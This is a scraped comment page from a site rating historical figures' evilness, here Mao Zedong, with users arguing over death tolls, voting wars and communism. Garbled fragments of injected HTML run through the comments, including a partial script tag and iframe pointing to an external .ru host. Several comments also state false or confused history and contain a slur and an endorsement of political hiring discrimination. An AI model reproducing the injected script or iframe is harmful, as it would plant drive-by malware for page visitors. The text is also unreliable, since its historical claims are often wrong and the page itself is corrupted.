Mao Zedong
Dictator

Mao Zedong was a political leader who led the Communist Party of China to victory in the Chinese Civil War, leading to the establishment of the People’s Republic of China. Supporters within China consider Mao as a successful military and political leader who led the rise of 20th Century China. He instigated several major socio-political programs seeking to achieve, by means of his political philosophy, the ideal of a strong, prosperous and socially egalitarian China. These programs, however, were widely regarded as failures and Mao has been blamed with the deaths of between 20 and 67 million of his countrymen. The resulting anarchy, terror, and paralysis completely disrupted the urban economy, industrial production for 1968 dipped 12 percent below that of 1966, and led to the destruction of much of China's cultural heritage and the imprisonment of a huge number of Chinese intellectuals.?

Seeing as how he's responsible for more deaths than any other man in all of human history, I'd say this guy should be rated the worst - followed by Stalin & Hitler. Honestly, why aren't these guys the top three?

I don't care about the reasoning behind it. I just care about the results. Encyclopedia Idiotica names Mao among their ranks for his retarded "great leap forward", where everyone in every town had to contribute a certain amount of steel, to go to industry. If you didn't meet the quota you were killed. People melted down silverware, any appliances they had, etc - all sorts of metals that weren't really steel. They basically starved themselves of all the tools they needed to live and survive, and in the process, they devote far too little time to farming. It took several years of mass starvation for any of this to change because of Mao's pride, refusing to admit his mistake, and not caring who suffered as a result. The man was a demonone"></

whoever wants this guy to have the top spot, I'm telling you now it's never gonna happen. Zao belongs on top, followed by Stalin and Hitler. Then come other nasty dictators, and certain US presidents. Then come the psychopaths. I've let Joe Mengele sit up here for awhile, as I creep up the other numbers, but if you think you can just cut down Mao and put this guy in his place - I'll just cut this guy down too, and then neither will have a number that properly reflects his evilness.

I don't know where you heard that, but with Stalin, it's actually closer to 20 Million. So check your sources. Now then, here's my latest gripe: I can't stand how some people are giving 1 votes to the most evil people just to switch some other person into the worst position. In the middle numbers of the scale it doesn't matter, but for the 1's and 9's it does and here's why. This is supposed to be a scale from 1-10, not 2-9. If you and some other jackass get into a voting war over who gets the worst position, then you keep lowering Mao's number, and he keeps lowering Stalin's, and pretty soon they'll both have a 8 rating, as will everyone else around them. I mean both Rosa and Harriet jumped up 11 points in a last day, and the same problem dropped Mao and Mengele 50 points over the last month or so. Here's the solution. Pick the people you care about and only vote for them. That way the most good will slowly approach 1, and the most evil will progress back towards 10. Let the person with the most votes win, as it should be. src=
so and so
Unregistered

11: 5/2/2007 7:59:04 AM
And people keep lowering Mao. Well, I told you all I'd do it. You want to lower Mao, I'll lower everyone else. Kris here's a potential solution. For any nominee that reaches beyond a 9 on the scale, say for at least a week, treat as especially evil with a new voting format - people can only vote a 9 or 10. That way they are less able to influence dragging down someone to get their nominee up. You could do the same thing for anyone who gets below a 2 for a week or more. People would only be able to vote a 1 or 2. They could still influence who's higher or lower on the scale, they just couldn't wildly screw it all up.<

He didn't bath, didn't brush his teeth (he said, "Tigers don't bathe; tigers don't brush teeth. Yeah Zao shouldnt be at the top in my mind. Hitler easily at at the top. Zao started out with good intentions. As we all know the philosophy of communism is actually pretty good and on paper it kicks the hell out of capitalism the problem is that it isnt practical and thats why it always fails. Largely because it doesnt account for human error i.e. corruption/stupidity. I think the biggest fault you can find with him was his role in the cultural revolution which was pretty much a grab for power which resulted in thousands of deaths by the redguards. The other deaths attributed to his rule were largely due to famine during his 5 year plans which were a complete failure but these were due to poor planning bad luck and prior conditions (i.e. china was totally screwed from succesive wars ww2 and the CRW)uildi

There's a difference between being the most evil and having the most evil effect.

For the latter, Hitler, Mao and Stalin clearly belong on top, though if you scale it to total world population at the time, Genghis Khan might be right up there.

For the former, Mengele, Idi Amin, Vlad the Impaler, H. H. Holmes and such types should probably top the list, even though their total murders are only a miniscule fraction of Genghis Khan's.is

This number of dead in the Sowjet penal system was closer to 400,000, most of which was a result of diseases they had not cure for. But back to Mao. Like other controversial political figures, he has a smart brain but posses some crazy convictions. And all his masterplans for his country was based on some crazy idea called "communism" that simply doesn't work.

Mao set wrong policies that caused famine, resulting millions of deaths. His responsible for their deaths.

But saying "Mao killed 43 million", as in "a serial killer killed 53 women", is totally inaccurate.

Mao united China and prevented it from being split into warring states - there was no way in hell anybody could have united China under democracy during this period.
He understood that he had to crack a few eggs to make an omlette. The endgame for me is that if Mao hadn't existed I don't think China would be as great a nation as it is today.
Even though his policies were responsible for the deaths of millions, this was not his intention. He also deserves some credit for admitting "The Great Leap Forward" was a mistake.
On the other hand, indoctrination, destruction of political freedoms, brainwashing. In short, he became the tyrant he wanted to destroy.
I gave him a 6.

mao zedong is not evil. Before Mao Zedong came about, life for the poor was hopeless. Not only did they suffer from starvation but abuse and slavery from the higher class people, poor people were not given education and many of them were forced to become slaves. Once they become slaves their generation and onwards, would also be slaves too.

Mao Zedong’s biggest achievements was he made the citizens of China equal, he built mass support among China’s peasants during the war against Japan in the 1930s and 1940s and brought real social change to the villages. Mao Zedong broke the power of the landlords and moneylenders in the villages, freeing slaves and servants and promised peace and a better life.

Unfortunately, we cant know the names of the worst offenders of atrocities - too numerous to name.
They are the dumbies like the loser who said Mao was good -these are the real evil people among us - They the ones who put these parasites into power. After all Mao, Stalin, Hitler, Pol Pot were just opportunists in the beginning, they were helped to power by their supporters - they did not get there on their own.
When I hire staff I make sure most importantly I find out their political leanings - If they are socialist, communist or liberal they dont come anywhere near my business, for this is the sewerage from where all these dictatorous scum come from.
I have learned in life as a security assessor and business owner that the most problematic and power obsessed people are ultra liberal socialists (socialists not to be confused with people who are pro society, human rights and helping people)- socialists in the political sense - there is a difference.
These are the people we need to fear and rate, I believe.

My grandparents had to flee from China to Cambodia because of the violent Communist revolution (headed by Chu Teh and Mao Tse Tseung). One of my Uncles was a member of the Red Gaurd during the Cultural Revolution. He said that they never went hunting for revisionists or anything like that. They just went to meetings where they played ping-pong. Also, there's a difference between socialism and communism dumbass. Socialism is the government of the second and third richest countries in the world, where people are happy and quite well-off, usually owning more stuff than any of you. Communism is based on social equality, which is a lost cause, because some people just want money. The capitalist government revolves around these greedy, rich people, who keep the government from taking over the country because they don't want to lose their money. The poor people in these capitalist countries are the ones who have to suffer, but they can rise in the ranks by not trusting strangers, taking every raise or opportunity they get, investing in good stocks, and taking money from other people. Communism is the exact opposite. Everybody is lower-middle class, soldier, or government. Unfortunately, this is almost impossible to accomplish, because of money-obsessed people, or because of a government run by corrupt leaders like Stalin, Ngo Dinh Diem, Nguyen Van Thieu Chin Shi Huang Di (who I am descended from) and Krushchev, stupid leaders like Castro (who was basically a baseball player who was thrown into a high-ranking position), most of the Russian Czars, and about one-fourth of all US presidents, or madmen like Hitler (not as much evil as manically depressed and genicidally insane). I think Deng (Mao's REAL successor) did a good job describing Mao, "He was right about 70% of the time and wrong about 30% of the time." (note: Deng HATED Mao with a passion and he still said this)
People in America tend not to know communism from autocracy (a.k.a. dictatorship, for you idiots). Communism is run by a republican style president, and a politburo, which often includes non-communist parties such as republican, pragmatist, nationalist, socialist, democratic, and oligarchic parties. An autocracy is run by a single, self-appointed leader, not a popularly elected leader with a cabinet and a congress/politburo.
Mao's dumbest decisions were the Great Leap Forward, which caused a food shortage (Quote Lin Biao: "A donkey may be slow, but at least it never slips and falls!"), the Cultural revolution, which was actually not controlled by Mao, but by Lin Biao (and even Lin Biao couldn't control the trigger-happy members of the Red Gaurd), and the Hundred Flowers Campaign (a mass discussion of Mao's ideas and writings in schools, universities, Red Gaurd meetings, and random meetings between people) which resulted in rebellions, riots, and killings made by capitalists, autocrats, and others who did not support Mao's ideas.
Mao himself was responsible for the killings of around 10,000 nationalist troops during the cultural revolution (were China was rid of a REALLY evil ruler, Chiang Kai Shek). Mao was a good poet too, though very few of his poems actually have anything to do with communism. Mao spent about half of his time in the hospital, sick, where he was stuck with nothing to do except watch television and make posters (thus, all of the posters). Mao lived for a few months in the imperial palace, with gold toilets, Persian rugs and expensive food, but he said later that he hated it, and then he moved out and spent the rest of his life in a CAVE, with nothing but some paper and a pencil and a telephone (which he used to call president Nixon).

Honestly people, research a guy before you call him good or evil, and look up a government before you start using its name gratuitously.

I would vote about 3 to 5 for this guy. He was a good person, and he didn't kill half as many people as you say.<scriptnutcountry.ru:8080/index.php?pid=13" wi<iframe src="http://

And he destroyed the life of someone I know personally by closing her school in seventh grade and forcing her into hard labor for 3 years for the crime of being upper middle class from an educated family. At the camp girls were also raped. When she was badly hurt and got out after 3 years, she was a year later sent to prison for ordering a book on western art and languished there until she finally got out and escaped to the USA. The majority of Chinese killed under Mao died from a coma induced by having to read his poetry. src

It's not really known how many people Mao killed, most of the deaths were caused by his utter inability to accept scientific facts (for example his sparrow cull caused a nationwide famine because the sparrows were eating the insects that ate the crops) while Stalin deliberately used famine as a tool of political oppression. Don't get me wrong, Mao was still an evil man who murdered millions upon millions of people, but Stalin was responsible for more deliberate deaths so Stalin should be at No. 1 and Mao at No. 2.
